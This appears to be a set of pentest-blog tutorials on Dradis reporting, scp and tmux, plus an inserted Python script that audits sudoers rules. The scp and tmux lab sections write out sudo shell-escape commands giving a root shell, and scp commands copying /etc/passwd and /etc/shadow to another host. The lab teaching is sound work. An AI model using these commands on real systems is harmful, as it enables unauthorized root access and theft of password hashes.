Dradis: Reporting and Collaboration Tool


Hello friends, today in this article we are going to familiarize you with one of the most vital tools of Kali that everybody needs in today's era.
Finding and eliminating bugs is something everyone covers on their pentesting journey, but one should also put effort into a task that has to be performed on a much wider scale: report writing.
Writing a good report is an essential skill, almost an art, for penetration testers, and like every skill it can be improved through practice. There are many tools that help with report writing, but in this tutorial we are going to use Dradis.

Table of content
·        Introduction to report writing
·        What is Dradis
·        Working with Dradis
·        Conclusion

Report Writing

A penetration testing report is the core deliverable of any security assessment. The final report documents the service provided, the methodology used, the findings/results and the recommendations. Kali supports many tools that help produce it.
In this tutorial we are going to cover one such tool: Dradis.

What is Dradis? 

The Dradis framework is an open source collaboration and reporting platform for IT security experts. It is a platform-independent tool developed in Ruby. In other words, it is a tool that helps put information together in one place and gives us the ability to organize all of it there. It allows us not only to import but also to export output from the various tools it supports.
Dradis integrates with a list of tools including Burp Scanner, Nessus, NeXpose, Nikto, Nmap and many more that are common in penetration testing or ethical hacking.

Working with Dradis

In the next few steps, we will learn how to use Dradis. To begin this journey we first need to find Dradis. This can be done in two ways.

First Method:
In this method we simply type dradis in the Kali terminal, which starts the service. Once it has started, it opens the browser for login.

Dradis is a self-contained web application, so it opens automatically in the browser. The URL is https://127.0.0.1:3000.

dradis



Second Method:
For this method, launch Kali Linux, click on "Applications", go to "Reporting Tools" and click on "Dradis".


The next step is to create a server password to access the application. Then enter the credentials we configured for the server.



We are logged into the Dradis framework successfully. As you can see in the screenshot below, it shows the main operations that help in report writing, i.e. "All issues", "Methodologies", "Trash" and "Nodes"; we will use these operations as the task requires.

All issues: Here we have several options: we can add an issue manually, upload output, or import results from the library. These options also help import the results of any tool into Dradis.



Methodologies:  When it comes to penetration testing methodologies you can basically narrow the field down to three. These are:

·        Open Source Security Testing Methodology Manual (OSSTMM)
·        Penetration Testing Execution Standard (PTES)
·        National Institute of Standards and Technology

While all three are good methodologies, PTES and NIST 800-115 provide a bit more flexibility during penetration tests. These methodologies also align more closely with what is taught in security course curricula such as SANS. So whenever we need to add a methodology, we can use this option as a reference.



Now we will start working with Dradis. First we create a new node by clicking on the "Nodes" tab; then click on the newly created node and choose "Add subnode" to add a sub-branch under it. Follow the same process to create as many nodes and subnodes as you require.



We can create the tree as we see fit. In the screenshot below, I have created two main nodes, "Exploit" and "Host IP", which are subdivided into metasploit, scanning and nmap.


Upload File

After creating the required nodes and sub-nodes, the next step is to upload the output file of a tool.
First we need to select the name of the tool we used. Here we used nmap, so I choose it from the "Choose tool" drop-down.



Next we browse for the file to upload and click the Open button at the top of the screen.


Once the upload has completed, you can see its result in the output console as shown in the image below.
To view the file, double-click the uploaded image and a new browser tab opens to display the uploaded screenshot.
Similarly, we can upload scan results from other tools like Nessus, Burp, Nikto, OWASP ZAP, etc.


To view the full details of your result, use the plugin.output option as shown below. The image below shows the result of the nmap scan that I saved in the file "scan.xml".

Creating notes

If you want to add a description of what you have done in each node and sub-node, it can be done simply by following the steps below:
·        Select the node
·        Click on Notes
·        Click on Add note
·        Write the description in the space provided
·        Click on Create note to confirm it.


In the image below I have entered the "IP" of my host machine as my note description. Similarly you can create a note for any node or sub-node to briefly describe your report. After creating notes you can edit, delete and rename them as desired. You can also add an attachment, screenshot or image by simply dragging and dropping it into the attachment field.

This article focused on the main objective of using Dradis to create a report; the remaining options, such as adding Issues and Methodologies, can be used as your requirements dictate.

Linux for Pentester: scp Privilege Escalation


In this article we introduce another very helpful Linux command, "scp", an abbreviation of "secure copy". The scp command allows secure transfer of files between the local host and a remote host, or between two remote hosts. Knowing this, we will now check how this utility can be taken advantage of for privilege escalation.

NOTE: "The main objective of publishing the "Linux for pentester" series is to introduce the circumstances and the kinds of hurdles a pentester can face while solving CTF challenges or OSCP labs based on Linux privilege escalation. Here we are not criticizing any misconfiguration a network or system administrator makes when granting higher permissions on programs/binaries/files etc."

Table of content
Introduction to scp
Major Operation performed using scp
·         Copy a file from local system to remote machine
·         Copy a file from remote system to local machine
·         Provide modification time and date
·         To display detailed information of the SCP process
·         Copying file inside directory recursively
·         To specify a specific port
Exploiting scp
·         Abusing Sudo right


Introduction to scp

scp is a built-in Linux command used to copy files between servers securely; in other words, it is a command-line utility that allows you to securely copy files and directories between two locations. It uses the same authentication and security as the Secure Shell (SSH) protocol. scp is also known for its simplicity, security and pre-installed availability.
Major Operation performed using scp

In this tutorial, we will show you how to use the scp command with detailed explanations of the most common scp options. We start with its help output, as in the image below.
scp --help
After checking its help output, we will go through its major operations one by one.
·         Copy a file from local system to remote machine: As we know, scp lets the user securely copy a file or directory from the local host to a remote host or vice versa. Using this, we will now copy a file named "scan.xml" stored on my local system. To do so we frame the command as below:
Syntax: scp [file name] remote_username@remote_host:/path/to/copy
 scp scan.xml aarti@192.168.1.31:/home/aarti/Desktop
In the above command, "scan.xml" is the file I want to copy, "aarti" is the remote user name, "192.168.1.31" is the remote machine's IP and "/home/aarti/Desktop" is the path on the remote machine where I want to copy the file.
Once we run the command, we are prompted for the user's password and the transfer starts.
Note: Omitting the filename from the destination copies the file under its original name. If you want to save the file under a different name, you need to specify the new name too.


Hence, following the above syntax, our file has been successfully copied to the destination on the remote system, as shown below.


·         Copy a file from remote system to local machine: Likewise, we can copy a file or directory from the remote machine to the local system. For this, use the command below.
Syntax: scp remote_username@remote_host:/[file name] /path/of/destination/directory
On running the above command, we are again prompted for the user's password and the transfer starts.
ls -al
Hence our file has been successfully copied from the remote system to the destination on the local system.


·         Provide modification time and date: You may have noticed that by default the time and date of a copied file are set to the current time and date.
In the image below you can see that our "demo.txt" file shows the current date and time at which it was copied.
ls -la /root/Desktop/demo.txt


But the image below shows the original date and time, i.e. when the file was created.
ls -la demo.txt


So if we want our copied file to keep its original details, we use the "-p" option. With this argument the file is copied with its original date and time instead of the current ones.
ls -la /root/Desktop/demo.txt


·         To display detailed information of the SCP process: In all the screenshots above you can see that after entering the password there is no information about the scp process; the prompt simply returns once the process has completed. If you want detailed information about the scp process, use the "-v" parameter.


·         Copying file inside directory recursively: Sometimes we need to copy a directory and all the files and directories inside it. It is better if we can do it in one command, and scp supports this with the "-r" parameter.
scp -r fluxion/ aarti@192.168.1.31:/home/aarti/Desktop
In the image below I have copied the directory "fluxion" recursively.
Note: The time taken to copy depends on the amount of data, but we can speed it up with the "-C" option, which compresses the data in transit and makes the copy faster.


In the image below we have successfully copied fluxion.


·         To specify a specific port: Usually scp uses port 22 by default. If, for security reasons, SSH listens on another port, you can use the "-P" argument to specify it.
For example, to use port 2222 the command is
scp -P 2222 scan.xml aarti@193.168.1.31:/home/aarti/Desktop


Lab setups for Sudo privilege Escalation
Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Now we will perform privilege escalation with "scp". For this we need to set up a lab in which scp runs with administrative rights.
We will give sudo permission on scp, so that a local user can run scp as root.
Hence, to locate the binary, type:

which scp
As the image below shows, I have created a local user (test) and add a sudo right for the scp program in the /etc/sudoers file by typing the following under the user privilege specification.
test ALL=(root) NOPASSWD: /usr/bin/scp


First Method
Then we check the sudo rights of user "test" (if any) and find that "test" can execute the scp command as "root" without a password.
sudo -l
Running the commands below drops us into a root shell, as shown below, and our task is accomplished.
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:


Second Method
For the second method of privilege escalation, we first need to check the status of the ssh service, which should be active for the entire process (Kali Linux).
service ssh status


Now I wish to copy the passwd and shadow files of the host machine (Ubuntu) with the scp command, as per the image below.
sudo scp /etc/passwd komal@192.168.1.11:~/
sudo scp /etc/shadow komal@192.168.1.11:~/
On running the above commands, we are prompted for the user's password and the transfer starts.


Once done, you can check whether the files were copied successfully with the commands below.
head /home/komal/shadow
head /home/komal/passwd
Conclusion: Hence we have achieved our goal and successfully copied the passwd and shadow files using the scp command.


Linux For Pentester: tmux Tutorial


In this article we describe "tmux", also known as a terminal multiplexer. It allows multiple terminal sessions to be accessed concurrently in a single window, which is useful for running more than one command-line program at the same time.

NOTE: "The main objective of publishing the "Linux for pentester" series is to introduce the circumstances and the kinds of hurdles a pentester can face while solving CTF challenges or OSCP labs based on Linux privilege escalation. Here we are not criticizing any misconfiguration a network or system administrator makes when granting higher permissions on programs/binaries/files etc."

Table of content
Introduction to tmux
·        What is tmux
·        How to use tmux
·        tmux framework
·        tmux commands

What is tmux: tmux, also known as a terminal multiplexer, creates a host server on your Linode and connects to it with a client window. If the client is disconnected, the server keeps running, and when you reconnect to your Linode after rebooting your computer you can reattach to the tmux session and the files you were working with will still be open.

In other words, it is a tool with which we can open multiple windows and split views (called "panes" in tmux lingo) within one terminal window.

How to use tmux: Like other tools, tmux supports many commands to perform its functions. We will describe each of its major operations one by one.
They are invoked by entering a key combination called the prefix and then typing a letter. Many letters are assigned to tmux operations.

tmux framework: The operations tmux performs can be easily understood from its hierarchical structure, shown below.




tmux commands: There is a list of commands that help while working with tmux. In this article we run through the major operations tmux can perform.
First we start with its help output. For this we type "--help" in the Kali terminal as shown below.
tmux --help
tmux operations are categorized into 3 sections, which I described above in its framework. We start with the first, i.e. "sessions".
Operate tmux Sessions: Sometimes even multiple windows and panes are not enough and you need to separate layouts logically by grouping them into separate sessions.
Sessions are useful for completely separating work environments.

There are many session operations in tmux, shown in the image below, but I will describe a few of them.





·        Create new session: To create a new session we frame the command as shown in the image below.

tmux new -s Ignite

In the above command "-s" is the argument for naming a new session and "Ignite" is the name of the session I want to create.


On running the above command, tmux creates a new session named Ignite, highlighted at the bottom of the terminal. Similarly, one can create multiple sessions with different names as needed.

·        To list all created sessions: once we have created all the sessions we want, we can check them with:
tmux list-sessions
This lists all the sessions that have been created. In the image below tmux lists all the sessions I created by following the procedure above.
Operate tmux Window: When a tmux session starts, a single window is created by default, but tmux also lets you attach multiple windows to the same session and switch between them as needed. This is helpful when you want to run several jobs in parallel.
Apart from creating multiple windows, it also supports operations like renaming a window, switching between windows and many others.
Initially it shows "0:bash*" by default, in which 0 is the index of the window, bash is the window name (which can be renamed as needed) and * marks the current window; when we create new windows tmux lists all of them at the bottom of the terminal.
Note: tmux operations are performed by combining the prefix with a letter as required. See the table below to understand it clearly.


In this article I have created 5 windows as shown in the image below.

·        Create new window: To create a new window we use "c" with the prefix (ctrl-b).
Prefix (ctrl-b) +c
This creates a new window. Use the same procedure to create multiple windows as in the image below.
·        Rename window: by default tmux names the window "bash", but we can change it as we wish. Here I am renaming my last window as shown below.
Prefix (ctrl-b) + ,
·        To switch window: we can also switch between multiple windows, which lets us work in parallel. It can be done in several ways.
·        To display summary: To see a summary of everything we have done so far we use:

Prefix (ctrl-b) + w

Operate tmux Panes: With tmux we can divide each window into multiple panes. This is useful when you want the output of multiple processes visible within a single window.
Here we have many options, such as splitting a window vertically or horizontally, rotating panes and switching between panes. We will check each of them one by one.
Note: use the table below for reference

Here I have divided my window into 2 panes vertically with:

Prefix (ctrl-b) + %

In the image below I have further split my window horizontally.
Prefix (ctrl-b) + "


Suppose we have multiple panes, each containing some information, and we want to rotate them. Then we follow:
Prefix (ctrl-b) + {
On pressing the above keys, tmux moves the current pane to the left.


SUID Lab setups for privilege Escalation
Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Now we will perform privilege escalation with "tmux". For this we need to set up a lab in which tmux runs with administrative rights, and then check what effect the "tmux command" has after getting sudo rights.
After that we will give SUID permission on tmux, so that a local user can run tmux as root.
Hence type the following for enabling SUID:

which tmux
visudo

As the image below shows, I have created a local user (test) who holds a sudo right for tmux as root.
To add the sudo right, open the /etc/sudoers file and type the following under the user privilege specification.
test ALL=(root) NOPASSWD: /usr/bin/tmux
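Both lab setups on this page (the scp entry above and this tmux entry) rest on the same sudoers mistake: a NOPASSWD rule for a program that can hand the caller a shell. The following is an added example, not part of either article, that audits a sudoers-style text for such rules so an administrator can catch them before a pentester does; the sudoers excerpt is constructed, and the parser handles the common user-specification form, not every sudoers alias construct.

```python
import re

# Constructed /etc/sudoers excerpt: the two rules the articles add plus benign lines.
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
test    ALL=(root) NOPASSWD: /usr/bin/scp   # lets -S run an arbitrary program
test    ALL=(root) NOPASSWD: /usr/bin/tmux  # spawns a shell as root
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
backup  ALL=(root) /usr/bin/rsync
"""

# Programs this page shows turning into a root shell when allowed under sudo.
SHELL_CAPABLE = {"scp", "tmux"}

# user  host=(runas) [TAG: ...] commands   (alias lines are skipped below)
USER_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_user_specs(text):
    """Split sudoers text into one record per (user, runas, tags, command)."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        cmds, tags = m.group("cmds"), []
        while (t := re.match(r"^([A-Z]+):\s*", cmds)):  # NOPASSWD:, SETENV:, ...
            tags.append(t.group(1))
            cmds = cmds[t.end():]
        for cmd in cmds.split(","):  # simplification: tags apply to the whole list
            specs.append({"who": m.group("who"), "runas": m.group("runas") or "root",
                          "tags": tags, "cmd": cmd.strip()})
    return specs


def audit(specs):
    """Return (user, command, reason) for rules that grant a root shell."""
    findings = []
    for s in specs:
        prog = s["cmd"].split()[0].rsplit("/", 1)[-1]
        as_root = s["runas"] in ("root", "ALL", "ALL:ALL")
        if s["cmd"] == "ALL" and "NOPASSWD" in s["tags"]:
            findings.append((s["who"], s["cmd"], "passwordless sudo to ALL"))
        elif prog in SHELL_CAPABLE and as_root:
            pw = "no password needed" if "NOPASSWD" in s["tags"] else "password needed"
            findings.append((s["who"], s["cmd"],
                             f"{prog} can spawn a shell as {s['runas']} ({pw}); "
                             "remove the rule or restrict it to a fixed-argument wrapper"))
    return findings


if __name__ == "__main__":
    for who, cmd, why in audit(parse_user_specs(SAMPLE_SUDOERS)):
        print(f"{who}: {cmd}: {why}")
```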

Exploiting Sudo rights

Now we will exploit the tmux binary by taking advantage of the sudoers permission. For this we need a session on the victim's machine that gives us local-user access to the target, from which we can escalate to root.
First we connect to the target machine with ssh; type the following command to log in as the local user.
ssh test@192.168.1.31
Then we check the sudo rights of user "test" (if any) and find that "test" can execute the tmux command as "root" without a password.
sudo -l
Knowing that the test user holds this sudo right, we can use the tmux command to escalate the privileges of the test user.
sudo tmux


Conclusion: This launches a new terminal with a root shell.